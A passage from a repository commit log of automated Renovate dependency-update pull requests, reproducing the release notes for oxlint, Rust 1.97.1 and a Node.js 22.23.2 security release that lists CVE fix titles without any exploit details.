([#​23279](https://redirect.github.com/oxc-project/oxc/issues/23279)) (Mikhail Baev) - [`4480609`](https://redirect.github.com/oxc-project/oxc/commit/4480609) linter: Add schema for `react/jsx-props-no-spreading` ([#​23276](https://redirect.github.com/oxc-project/oxc/issues/23276)) (Mikhail Baev) - [`08d68a5`](https://redirect.github.com/oxc-project/oxc/commit/08d68a5) linter/react: Implement `jsx-no-literals` rule ([#​23145](https://redirect.github.com/oxc-project/oxc/issues/23145)) (kapobajza) - [`9a2788b`](https://redirect.github.com/oxc-project/oxc/commit/9a2788b) linter/unicorn: Implement `prefer-export-from` rule ([#​22935](https://redirect.github.com/oxc-project/oxc/issues/22935)) (AliceLanniste) - [`bdb723c`](https://redirect.github.com/oxc-project/oxc/commit/bdb723c) linter/unicorn: Implement prefer-single-call rule ([#​23235](https://redirect.github.com/oxc-project/oxc/issues/23235)) (Yuzhe Shi) - [`31543ed`](https://redirect.github.com/oxc-project/oxc/commit/31543ed) linter: Add schema for `vue/define-props-destructuring` ([#​23252](https://redirect.github.com/oxc-project/oxc/issues/23252)) (Sysix) - [`21b6c3d`](https://redirect.github.com/oxc-project/oxc/commit/21b6c3d) linter: Add schema for `oxc/no-async-endpoint-handlers` ([#​23251](https://redirect.github.com/oxc-project/oxc/issues/23251)) (Sysix) - [`e77ff81`](https://redirect.github.com/oxc-project/oxc/commit/e77ff81) linter: Add schema for `unicorn/prefer-object-from-entries` ([#​23249](https://redirect.github.com/oxc-project/oxc/issues/23249)) (Mikhail Baev) - [`bcac2d6`](https://redirect.github.com/oxc-project/oxc/commit/bcac2d6) linter: Add schema for `jest/vitest/no-restricted-matchers` ([#​23247](https://redirect.github.com/oxc-project/oxc/issues/23247)) (Sysix) - [`539f036`](https://redirect.github.com/oxc-project/oxc/commit/539f036) linter: Add schema for `jest/vitest/no-restricted-*-methods` ([#​23246](https://redirect.github.com/oxc-project/oxc/issues/23246)) (Sysix) - [`dd1b927`](https://redirect.github.com/oxc-project/oxc/commit/dd1b927) linter/vue: Implement require-default-prop rule ([#​22951](https://redirect.github.com/oxc-project/oxc/issues/22951)) (bab) - [`3f018e7`](https://redirect.github.com/oxc-project/oxc/commit/3f018e7) linter: Add schema for `unicorn/no-instanceof-builtins` ([#​23225](https://redirect.github.com/oxc-project/oxc/issues/23225)) (Mikhail Baev) - [`e0d0f78`](https://redirect.github.com/oxc-project/oxc/commit/e0d0f78) linter: Verify promise/no-callback-in-promise schema ([#​23141](https://redirect.github.com/oxc-project/oxc/issues/23141)) (beanscg) - [`123d4f4`](https://redirect.github.com/oxc-project/oxc/commit/123d4f4) linter: Add schema for `jest/vitest/valid-expect` ([#​23185](https://redirect.github.com/oxc-project/oxc/issues/23185)) (Sysix) - [`46c8a21`](https://redirect.github.com/oxc-project/oxc/commit/46c8a21) linter: Add schema for `jest/vitest/require-top-level-describe` ([#​23184](https://redirect.github.com/oxc-project/oxc/issues/23184)) (Sysix) - [`41465cf`](https://redirect.github.com/oxc-project/oxc/commit/41465cf) linter: Add schema for `jest/vitest/prefer-snapshot-hint` ([#​23183](https://redirect.github.com/oxc-project/oxc/issues/23183)) (Sysix) - [`d068b9b`](https://redirect.github.com/oxc-project/oxc/commit/d068b9b) linter: Add schema for `jest/vitest/prefer-expect-assertions` ([#​23181](https://redirect.github.com/oxc-project/oxc/issues/23181)) (Sysix) - [`064a1ee`](https://redirect.github.com/oxc-project/oxc/commit/064a1ee) linter: Add schema for `jest/prefer-ending-with-an-expect` ([#​23180](https://redirect.github.com/oxc-project/oxc/issues/23180)) (Sysix) - [`d046797`](https://redirect.github.com/oxc-project/oxc/commit/d046797) linter: Add schema for `jest/vitest/no-standalone-expect` ([#​23179](https://redirect.github.com/oxc-project/oxc/issues/23179)) (Sysix) - [`137b9a6`](https://redirect.github.com/oxc-project/oxc/commit/137b9a6) linter: Add schema for `jest/vitest/no-large-snapshots` ([#​23178](https://redirect.github.com/oxc-project/oxc/issues/23178)) (Sysix) - [`0f3e4a5`](https://redirect.github.com/oxc-project/oxc/commit/0f3e4a5) linter: Add schema for `jest/vitest/no-hooks` ([#​23177](https://redirect.github.com/oxc-project/oxc/issues/23177)) (Sysix) - [`cd0b384`](https://redirect.github.com/oxc-project/oxc/commit/cd0b384) linter: Add schema for `unicorn/explicit-length-check` ([#​23155](https://redirect.github.com/oxc-project/oxc/issues/23155)) (Mikhail Baev) - [`01b74c4`](https://redirect.github.com/oxc-project/oxc/commit/01b74c4) linter: Add schema for `jest/no-deprecated-functions` ([#​23136](https://redirect.github.com/oxc-project/oxc/issues/23136)) (Sysix) - [`9d6a387`](https://redirect.github.com/oxc-project/oxc/commit/9d6a387) linter: Add schema for `unicorn/catch-error-name` ([#​23137](https://redirect.github.com/oxc-project/oxc/issues/23137)) (Mikhail Baev) - [`0da8efa`](https://redirect.github.com/oxc-project/oxc/commit/0da8efa) linter: Add schema for `jest/vitest/max-nested-describe` ([#​23131](https://redirect.github.com/oxc-project/oxc/issues/23131)) (Sysix) - [`d71c9fd`](https://redirect.github.com/oxc-project/oxc/commit/d71c9fd) linter: Add schema for `eslint/no-use-before-define` ([#​23129](https://redirect.github.com/oxc-project/oxc/issues/23129)) (Sysix) ##### 🐛 Bug Fixes - [`26ddac6`](https://redirect.github.com/oxc-project/oxc/commit/26ddac6) linter: Avoid config schema generation for `jsx_a11y/no-noninteractive-element-interactions` ([#​23385](https://redirect.github.com/oxc-project/oxc/issues/23385)) (Sysix) - [`40556ad`](https://redirect.github.com/oxc-project/oxc/commit/40556ad) linter: Parse `jsx-a11y/control-has-associated-label` config with `DefaultRuleConfig` ([#​23373](https://redirect.github.com/oxc-project/oxc/issues/23373)) (Sysix) - [`71e9648`](https://redirect.github.com/oxc-project/oxc/commit/71e9648) linter: Expose no-noninteractive-element-interactions schema ([#​23283](https://redirect.github.com/oxc-project/oxc/issues/23283)) (camc314) - [`6c86d1c`](https://redirect.github.com/oxc-project/oxc/commit/6c86d1c) linter/react-perf: Correct nativeAllowList all schema ([#​23229](https://redirect.github.com/oxc-project/oxc/issues/23229)) (camc314) - [`4dd52de`](https://redirect.github.com/oxc-project/oxc/commit/4dd52de) linter/react-perf: Re-generate stale snapshots ([#​23228](https://redirect.github.com/oxc-project/oxc/issues/23228)) (camc314) - [`8f3db61`](https://redirect.github.com/oxc-project/oxc/commit/8f3db61) linter: Allow options for `eslint/capitalized-comments` ([#​23139](https://redirect.github.com/oxc-project/oxc/issues/23139)) (Sysix) ##### ⚡ Performance - [`f09707e`](https://redirect.github.com/oxc-project/oxc/commit/f09707e) linter: `jest/no-deprecated-functions` store config version as `usize` ([#​23138](https://redirect.github.com/oxc-project/oxc/issues/23138)) (Sysix) ##### 📚 Documentation - [`f682e25`](https://redirect.github.com/oxc-project/oxc/commit/f682e25) linter: Remove manually written options doc for `eslint/prefer-arrow-callback` ([#​23438](https://redirect.github.com/oxc-project/oxc/issues/23438)) (Mikhail Baev) - [`64c942c`](https://redirect.github.com/oxc-project/oxc/commit/64c942c) linter: Remove manually written options doc for `eslint/no-sequences` ([#​23420](https://redirect.github.com/oxc-project/oxc/issues/23420)) (Mikhail Baev) - [`14abf32`](https://redirect.github.com/oxc-project/oxc/commit/14abf32) linter/react-perf: Use autogenerated docs ([#​23227](https://redirect.github.com/oxc-project/oxc/issues/23227)) (camc314) ### [`v1.69.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1690---2026-06-08) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.68.0...oxlint_v1.69.0) ##### 🚀 Features - [`e805174`](https://redirect.github.com/oxc-project/oxc/commit/e805174) linter: Add schema for `jest/vitest/max-expects` ([#​23105](https://redirect.github.com/oxc-project/oxc/issues/23105)) (Sysix) - [`7850577`](https://redirect.github.com/oxc-project/oxc/commit/7850577) linter: Add schema for `jest/vitest/expect-expect` ([#​23104](https://redirect.github.com/oxc-project/oxc/issues/23104)) (Sysix) - [`75f641a`](https://redirect.github.com/oxc-project/oxc/commit/75f641a) linter: Add schema for `jest/vitest/consistent-test-it` ([#​23103](https://redirect.github.com/oxc-project/oxc/issues/23103)) (Sysix) - [`5125f89`](https://redirect.github.com/oxc-project/oxc/commit/5125f89) linter/unicorn: Support no-null `checkArguments` option ([#​23098](https://redirect.github.com/oxc-project/oxc/issues/23098)) (camc314) - [`b8b9797`](https://redirect.github.com/oxc-project/oxc/commit/b8b9797) linter: Add schema for `import-max-dependencies` ([#​23096](https://redirect.github.com/oxc-project/oxc/issues/23096)) (Sysix) - [`65cb47a`](https://redirect.github.com/oxc-project/oxc/commit/65cb47a) linter/eslint: Support no-unused-expressions `ignoreDirectives` option ([#​23097](https://redirect.github.com/oxc-project/oxc/issues/23097)) (camc314) - [`f6c36d5`](https://redirect.github.com/oxc-project/oxc/commit/f6c36d5) linter: Add schema for `import/prefer-default-export` ([#​23091](https://redirect.github.com/oxc-project/oxc/issues/23091)) (Sysix) - [`0d4a5d1`](https://redirect.github.com/oxc-project/oxc/commit/0d4a5d1) linter: Add schema for `eslint/sort-vars` ([#​23090](https://redirect.github.com/oxc-project/oxc/issues/23090)) (Sysix) - [`fdb5bf5`](https://redirect.github.com/oxc-project/oxc/commit/fdb5bf5) linter: Add schema for `eslint/radix` ([#​23082](https://redirect.github.com/oxc-project/oxc/issues/23082)) (Sysix) - [`05b4dcf`](https://redirect.github.com/oxc-project/oxc/commit/05b4dcf) linter: Add schema for `eslint/prefer-const` ([#​23081](https://redirect.github.com/oxc-project/oxc/issues/23081)) (Sysix) - [`5a06c4d`](https://redirect.github.com/oxc-project/oxc/commit/5a06c4d) linter/vue: Implement next-tick-style rule ([#​23041](https://redirect.github.com/oxc-project/oxc/issues/23041)) (Alex Peshkov) - [`e38a36a`](https://redirect.github.com/oxc-project/oxc/commit/e38a36a) linter: Add schema for `eslint/operator-assignment` ([#​23080](https://redirect.github.com/oxc-project/oxc/issues/23080)) (Sysix) - [`907cee7`](https://redirect.github.com/oxc-project/oxc/commit/907cee7) linter: Add schema for `eslint/no-warning-comments` ([#​23075](https://redirect.github.com/oxc-project/oxc/issues/23075)) (Sysix) - [`9470bb2`](https://redirect.github.com/oxc-project/oxc/commit/9470bb2) linter: Add schema for `eslint/no-unused-vars` ([#​23073](https://redirect.github.com/oxc-project/oxc/issues/23073)) (Sysix) - [`234b5cf`](https://redirect.github.com/oxc-project/oxc/commit/234b5cf) linter: Add schema for `eslint/no-shadow` ([#​23072](https://redirect.github.com/oxc-project/oxc/issues/23072)) (Sysix) - [`de0dd8b`](https://redirect.github.com/oxc-project/oxc/commit/de0dd8b) linter: Add schema for `eslint/no-restricted-exports` ([#​23020](https://redirect.github.com/oxc-project/oxc/issues/23020)) (Sysix) - [`faa3e0d`](https://redirect.github.com/oxc-project/oxc/commit/faa3e0d) linter: Add schema for `eslint/no-param-reassign` ([#​23018](https://redirect.github.com/oxc-project/oxc/issues/23018)) (Sysix) - [`dbc9c27`](https://redirect.github.com/oxc-project/oxc/commit/dbc9c27) linter: Add schema for `eslint/no-magic-numbers` ([#​23017](https://redirect.github.com/oxc-project/oxc/issues/23017)) (Sysix) - [`38d3569`](https://redirect.github.com/oxc-project/oxc/commit/38d3569) linter: Add schema for `eslint/no-inner-declarations` ([#​23016](https://redirect.github.com/oxc-project/oxc/issues/23016)) (Sysix) - [`008fa41`](https://redirect.github.com/oxc-project/oxc/commit/008fa41) linter: Add schema for `eslint/no-constant-condition` ([#​22991](https://redirect.github.com/oxc-project/oxc/issues/22991)) (Sysix) - [`ca44623`](https://redirect.github.com/oxc-project/oxc/commit/ca44623) linter: Add schema for `eslint/no-empty-function` ([#​22988](https://redirect.github.com/oxc-project/oxc/issues/22988)) (Sysix) - [`43eb04d`](https://redirect.github.com/oxc-project/oxc/commit/43eb04d) linter: Add schema for `eslint/id-match` ([#​22987](https://redirect.github.com/oxc-project/oxc/issues/22987)) (Sysix) - [`a800f27`](https://redirect.github.com/oxc-project/oxc/commit/a800f27) linter: Add schema for `eslint/capitalized-comments` ([#​22984](https://redirect.github.com/oxc-project/oxc/issues/22984)) (Sysix) - [`96e2d32`](https://redirect.github.com/oxc-project/oxc/commit/96e2d32) linter: Add schema for `eslint/id-length` ([#​22963](https://redirect.github.com/oxc-project/oxc/issues/22963)) (Sysix) - [`545493f`](https://redirect.github.com/oxc-project/oxc/commit/545493f) linter: Add schema for `eslint/complexity` ([#​22960](https://redirect.github.com/oxc-project/oxc/issues/22960)) (Sysix) - [`5f0b558`](https://redirect.github.com/oxc-project/oxc/commit/5f0b558) linter: Add schema for `eslint/class-methods-use-this` ([#​22959](https://redirect.github.com/oxc-project/oxc/issues/22959)) (Sysix) - [`719b720`](https://redirect.github.com/oxc-project/oxc/commit/719b720) linter: Add schema for simple rule configurations ([#​22948](https://redirect.github.com/oxc-project/oxc/issues/22948)) (Sysix) - [`fd00966`](https://redirect.github.com/oxc-project/oxc/commit/fd00966) linter: Add right schema for `eslint/max-*` rules ([#​22923](https://redirect.github.com/oxc-project/oxc/issues/22923)) (Sysix) - [`1226d78`](https://redirect.github.com/oxc-project/oxc/commit/1226d78) linter: Fill schema with rule configurations ([#​22907](https://redirect.github.com/oxc-project/oxc/issues/22907)) (Sysix) - [`8f423c1`](https://redirect.github.com/oxc-project/oxc/commit/8f423c1) linter/vue: Implement `require-direct-export` rule ([#​17623](https://redirect.github.com/oxc-project/oxc/issues/17623)) (yefan) - [`78e915b`](https://redirect.github.com/oxc-project/oxc/commit/78e915b) linter/vue: Implement no-reserved-props rule ([#​22914](https://redirect.github.com/oxc-project/oxc/issues/22914)) (bab) - [`0f200a9`](https://redirect.github.com/oxc-project/oxc/commit/0f200a9) linter/vue: Implement require-prop-types rule ([#​22083](https://redirect.github.com/oxc-project/oxc/issues/22083)) (Alex Peshkov) - [`5da9da9`](https://redirect.github.com/oxc-project/oxc/commit/5da9da9) linter/vue: Implement no-reserved-keys rule ([#​21780](https://redirect.github.com/oxc-project/oxc/issues/21780)) (bab) - [`75e14a8`](https://redirect.github.com/oxc-project/oxc/commit/75e14a8) linter/vue: Implement prop-name-casing rule ([#​22892](https://redirect.github.com/oxc-project/oxc/issues/22892)) (bab) ##### 🐛 Bug Fixes - [`0383e61`](https://redirect.github.com/oxc-project/oxc/commit/0383e61) linter: Fix schema for rules without a config ([#​22946](https://redirect.github.com/oxc-project/oxc/issues/22946)) (Sysix) ##### 📚 Documentation - [`dadafe3`](https://redirect.github.com/oxc-project/oxc/commit/dadafe3) oxlint, oxfmt: Mention migrate skills in npm READMEs ([#​22965](https://redirect.github.com/oxc-project/oxc/issues/22965)) (Boshen) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
df86d52594 |
chore: bump up Rust to v1.97.1 (#15389)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [rust](https://rust-lang.org/) ([source](https://redirect.github.com/rust-lang/rust), [changelog](https://redirect.github.com/rust-lang/rust/blob/main/RELEASES.md)) | toolchain | minor | `1.96.0` → `1.97.1` | --- ### Release Notes <details> <summary>rust-lang/rust (rust)</summary> ### [`v1.97.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1971-2026-07-16) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.97.0...1.97.1) \========================== <a id="1.97.1"></a> - [rustc: Fix miscompilation in LLVM optimization](https://redirect.github.com/rust-lang/rust/issues/159035) This backports an LLVM submodule bump to include the LLVM-side fix and a revert of the rustc change that is one known trigger for the bug. The rustc side revert should not be strictly necessary but is done out of abundance of caution. ### [`v1.97.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1970-2026-07-09) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.96.1...1.97.0) \========================== <a id="1.97.0-Language"></a> ## Language - [Consider `Result<T, Uninhabited>` and `ControlFlow<Uninhabited, T>` to be equivalent to `T` for must use lint](https://redirect.github.com/rust-lang/rust/pull/148214) - [Add allow-by-default `dead_code_pub_in_binary` lint for unused pub items in binary crates](https://redirect.github.com/rust-lang/rust/pull/149509) - [Stabilize the `div32`, `lam-bh`, `lamcas`, `ld-seq-sa` and `scq` target features](https://redirect.github.com/rust-lang/rust/pull/154510) - [Stabilize `cfg(target_has_atomic_primitive_alignment)`](https://redirect.github.com/rust-lang/rust/pull/155006) - [Allow trailing `self` in imports in more cases](https://redirect.github.com/rust-lang/rust/pull/155137) <a id="1.97.0-Platform-Support"></a> ## Platform Support - [nvptx64-nvidia-cuda: drop support for old architectures and old ISAs](https://redirect.github.com/rust-lang/rust/pull/152443) Refer to Rust's [platform support page][platform-support-doc] for more information on Rust's tiered platform support. [platform-support-doc]: https://doc.rust-lang.org/rustc/platform-support.html <a id="1.97.0-Stabilized-APIs"></a> ## Stabilized APIs - [`Default for RepeatN`](https://doc.rust-lang.org/stable/std/iter/struct.RepeatN.html#impl-Default-for-RepeatN%3CA%3E) - [`Copy for ffi::FromBytesUntilNulError`](https://doc.rust-lang.org/stable/std/ffi/struct.FromBytesUntilNulError.html#impl-Copy-for-FromBytesUntilNulError) - [`Send for std::fs::File` on UEFI](https://redirect.github.com/rust-lang/rust/pull/154003) - [`<{integer}>::isolate_highest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_highest_one) - [`<{integer}>::isolate_lowest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_lowest_one) - [`<{integer}>::highest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.highest_one) - [`<{integer}>::lowest_one`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.lowest_one) - [`<{integer}>::bit_width`](https://doc.rust-lang.org/stable/std/primitive.u32.html#method.bit_width) - [`NonZero<{integer}>::isolate_highest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_highest_one) - [`NonZero<{integer}>::isolate_lowest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_lowest_one) - [`NonZero<{integer}>::highest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.highest_one) - [`NonZero<{integer}>::lowest_one`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.lowest_one) - [`NonZero<{integer}>::bit_width`](https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.bit_width) These previously stable APIs are now stable in const contexts: - [`char::is_control`](https://doc.rust-lang.org/stable/std/primitive.char.html#method.is_control) <a id="1.97.0-Cargo"></a> ## Cargo - [Stabilize `build.warnings` config.](https://redirect.github.com/rust-lang/cargo/pull/16796) This controls how lint warnings from local packages are treated. Useful for enforcing a warning-free build in CI, replacing `-Dwarnings`. [docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#buildwarnings) - [Stabilize `resolver.lockfile-path` config.](https://redirect.github.com/rust-lang/cargo/pull/16694) This allows specifying the path to the lockfile to use when resolving dependencies. Useful when working with read-only source directories. [docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#resolverlockfile-path) - [cargo-clean: Error when `--target-dir` doesn't look like a Cargo target directory.](https://redirect.github.com/rust-lang/cargo/pull/16712) This prevents accidental deletion of non-target directories. - [Add `-m` shorthand for `--manifest-path`](https://redirect.github.com/rust-lang/cargo/pull/16858) - [Remove `curl` dependency from `crates-io` crate](https://redirect.github.com/rust-lang/cargo/pull/16936) <a id="1.97.0-Rustdoc"></a> ## Rustdoc - [Stabilize `--emit` flag](https://redirect.github.com/rust-lang/rust/pull/146220) - [Stabilize `--remap-path-prefix`](https://redirect.github.com/rust-lang/rust/pull/155307) <a id="1.97.0-Compatibility-Notes"></a> ## Compatibility Notes - [Emit a future-compatibility warning when relying on `f32: From<{float}>` to constrain `{float}`](https://redirect.github.com/rust-lang/rust/pull/139087) - [Rust will use the v0 symbol mangling scheme by default.](https://redirect.github.com/rust-lang/rust/pull/151994) This may cause some tools (such as debuggers or profilers, especially with old versions) to fail to demangle symbols emitted by Rust. It may also cause the formatting of text in backtraces to change. - [Prevent deref coercions in `pin!`, in order to prevent unsoundness.](https://redirect.github.com/rust-lang/rust/pull/153457) The most likely case where this might impact users is: writing `pin!(x)` where `x` has type `&mut T` will now always correctly produce a value of type `Pin<&mut &mut T>`, instead of sometimes allowing a coercion that produces a value of type `Pin<&mut T>`. This coercion was previously incorrectly allowed since Rust 1.88.0. - [Deprecate `std::char` constants and functions](https://redirect.github.com/rust-lang/rust/pull/153873) - [Warn on linker output by default](https://redirect.github.com/rust-lang/rust/pull/153968) - [Remove hidden `f64` methods which have been deprecated since 1.0](https://redirect.github.com/rust-lang/rust/pull/153975) - [report the `varargs_without_pattern` lint in deps](https://redirect.github.com/rust-lang/rust/pull/154599) - [Forbid passing generic arguments to module path segments even if the module reexports a generic enum variant](https://redirect.github.com/rust-lang/rust/pull/154971) - [Error on invalid macho `link_section` specifier](https://redirect.github.com/rust-lang/rust/pull/155065) - The encoding of certain `enum`s [have changed](https://redirect.github.com/rust-lang/rust/pull/155473). This is not a breaking change, as it only applies to `enum`s without layout guarantees, but is noted here as we've seen people impacted from having made assumptions about the layout algorithm. - [Error on `#[export_name = "..."]` where the name is empty](https://redirect.github.com/rust-lang/rust/pull/155515) - [Syntactically reject tuple index shorthands in struct patterns](https://redirect.github.com/rust-lang/rust/pull/155698) - [validate `#[link_name = "..."]` & `#[link(name = "...")]` parameters](https://redirect.github.com/rust-lang/rust/pull/155817) - On Windows, after calling `shutdown` on a socket to shut down the write side, attempting to write to the socket will now produce a `BrokenPipe` error rather than `Other`. [Map `WSAESHUTDOWN` to `io::ErrorKind::BrokenPipe`](https://redirect.github.com/rust-lang/rust/pull/156063) ### [`v1.96.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1961-2026-06-30) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.96.0...1.96.1) \=========================== <a id="1.96.1"></a> - [Cargo: fix timeout/retry behavior](https://redirect.github.com/rust-lang/cargo/pull/17131) - [Cargo: apply patches for CVE-2025-15661, CVE-2026-55199, and CVE-2026-55200 to libssh2](https://redirect.github.com/rust-lang/cargo/pull/17140) - [rustc: fix miscompilation in MIR optimization](https://redirect.github.com/rust-lang/rust/pull/158214) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
5c38f1376c |
chore: bump up Node.js to v22.23.2 (#15384)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.23.1` → `22.23.2` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.23.2`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.2): 2026-07-29, Version 22.23.2 'Jod' (LTS), @​marco-ippolito [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.23.1...v22.23.2) This is a security release. ##### Notable Changes - (CVE-2026-56846) http2: retain header memory in session accounting (Matteo Collina) – High - (CVE-2026-56848) http2: defer rst stream while in scope (Matteo Collina) – High - (CVE-2026-58043) permission: avoid granting radix split nodes (RafaelGSS) – High - (CVE-2026-56850) https: distinguish PFX object-array agent keys (RafaelGSS) – Medium - (CVE-2026-58040) https: bind identity checks to session reuse (Matteo Collina) – Medium - (CVE-2026-58042) dns: handle large resolveAny address replies (RafaelGSS) – Medium - (CVE-2026-58045) zlib: throw on out-of-bounds write buffers (RafaelGSS) – Medium - (CVE-2026-56847) permission: enforce fs write permission for trace events (RafaelGSS) – Low - (CVE-2026-58039) permission: check final report output path (RafaelGSS) – Low - (CVE-2026-58044) http: reject requests exceeding max header count (Matteo Collina) – Low - deps: update llhttp to 9.4.3 (Paolo Insogna) - deps: update undici to 6.28.0 (Node.js GitHub Bot) ##### Commits - \[[`4b12ac38a1`](https://redirect.github.com/nodejs/node/commit/4b12ac38a1)] - **deps**: update llhttp to 9.4.3 (Paolo Insogna) [nodejs-private/node-private#935](https://redirect.github.com/nodejs-private/node-private/pull/935) - \[[`3fd0aa51d0`](https://redirect.github.com/nodejs/node/commit/3fd0aa51d0)] - **deps**: update undici to 6.28.0 (Node.js GitHub Bot) [#​64714](https://redirect.github.com/nodejs/node/pull/64714) - \[[`22efc051a3`](https://redirect.github.com/nodejs/node/commit/22efc051a3)] - **(CVE-2026-58042)** **dns**: handle large resolveAny address replies (RafaelGSS) [nodejs-private/node-private#929](https://redirect.github.com/nodejs-private/node-private/pull/929) - \[[`c8525ac3a6`](https://redirect.github.com/nodejs/node/commit/c8525ac3a6)] - **(CVE-2026-58044)** **http**: reject requests exceeding max header count (Matteo Collina) [nodejs-private/node-private#932](https://redirect.github.com/nodejs-private/node-private/pull/932) - \[[`daa6d25e3d`](https://redirect.github.com/nodejs/node/commit/daa6d25e3d)] - **(CVE-2026-56848)** **http2**: defer rst stream while in scope (Matteo Collina) [nodejs-private/node-private#921](https://redirect.github.com/nodejs-private/node-private/pull/921) - \[[`f14d78b9e0`](https://redirect.github.com/nodejs/node/commit/f14d78b9e0)] - **(CVE-2026-56846)** **http2**: retain header memory in session accounting (Matteo Collina) [#​63752](https://redirect.github.com/nodejs/node/pull/63752) - \[[`51123159fe`](https://redirect.github.com/nodejs/node/commit/51123159fe)] - **(CVE-2026-58040)** **https**: bind identity checks to session reuse (Matteo Collina) [nodejs-private/node-private#934](https://redirect.github.com/nodejs-private/node-private/pull/934) - \[[`acaf4266b2`](https://redirect.github.com/nodejs/node/commit/acaf4266b2)] - **(CVE-2026-56850)** **https**: distinguish PFX object-array agent keys (RafaelGSS) [nodejs-private/node-private#930](https://redirect.github.com/nodejs-private/node-private/pull/930) - \[[`440329f624`](https://redirect.github.com/nodejs/node/commit/440329f624)] - **(CVE-2026-58043)** **permission**: avoid granting radix split nodes (RafaelGSS) [nodejs-private/node-private#911](https://redirect.github.com/nodejs-private/node-private/pull/911) - \[[`ed18b9cc07`](https://redirect.github.com/nodejs/node/commit/ed18b9cc07)] - **(CVE-2026-58039)** **permission**: check final report output path (RafaelGSS) [nodejs-private/node-private#926](https://redirect.github.com/nodejs-private/node-private/pull/926) - \[[`0566c3cccd`](https://redirect.github.com/nodejs/node/commit/0566c3cccd)] - **(CVE-2026-56847)** **permission**: enforce fs write permission for trace events (RafaelGSS) [nodejs-private/node-private#927](https://redirect.github.com/nodejs-private/node-private/pull/927) - \[[`0d072480c3`](https://redirect.github.com/nodejs/node/commit/0d072480c3)] - **(CVE-2026-58045)** **zlib**: throw on out-of-bounds write buffers (RafaelGSS) [nodejs-private/node-private#931](https://redirect.github.com/nodejs-private/node-private/pull/931) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
fb647b6003 |
chore: bump up js-yaml version to v5 [SECURITY] (#15385)
